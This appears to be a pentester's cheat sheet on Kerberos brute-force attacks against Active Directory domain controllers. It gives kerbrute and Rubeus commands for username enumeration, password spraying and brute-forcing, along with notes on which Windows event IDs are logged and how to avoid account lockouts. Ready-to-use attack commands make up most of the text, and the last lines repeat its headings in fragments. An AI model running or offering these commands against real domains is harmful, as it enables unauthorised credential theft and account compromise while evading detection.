1. Kerberos brute-force

no domain accounts required; just connectivity to KDC (DC)
Kerberos pre-auth errors not logged in AD as normal logon failure (event 4625) but as specific Kerberos pre-auth failure (event 4771)
- will increment failed login counts
Kerberos indicates whether username is correct regardless of correct/incorrect password
- good for:
  - brute-forcing user:pass combos or single user against wordlist
  - enumerating usernames
  - password spraying against userlist
possible to discover accounts w/o pre-auth requirements which is useful for ASREPRoast attacks

NOTE: a brute-force attack is always susceptible to being detected and blocked, hence, should be used with care.

Tools: kerbrute (Linux/Windows), Rubeus (Windows)

Linux

~/scripts/kerbrute userenum --dc $IP -d DOMAIN USERLIST

Safe to “bruteforce” as it does not cause any login failures, hence, no account lockouts. Only triggers event ID 4768 which denotes that a Kerberos ticket was requested.

~/scripts/kerbrute passwordspray --dc $IP -d DOMAIN USERLIST PASSWORD

~/scripts/kerbrute bruteuser --dc $IP -d DOMAIN PASSWORDLIST USERNAME

cat CREDS | ~/scripts/kerbrute bruteforce --dc $IP -d DOMAIN -

Windows

.\Rubeus.exe brute /users:USERLIST /passwords:PASSWORDLIST /domain:DOMAIN /outfile:FILE

1. Kerberos brute-force#

Tools: kerbrute (Linux/Windows), Rubeus (Windows)#

Linux#

Windows#

1. Kerberos brute-force

Tools: kerbrute (Linux/Windows), Rubeus (Windows)

Linux

Windows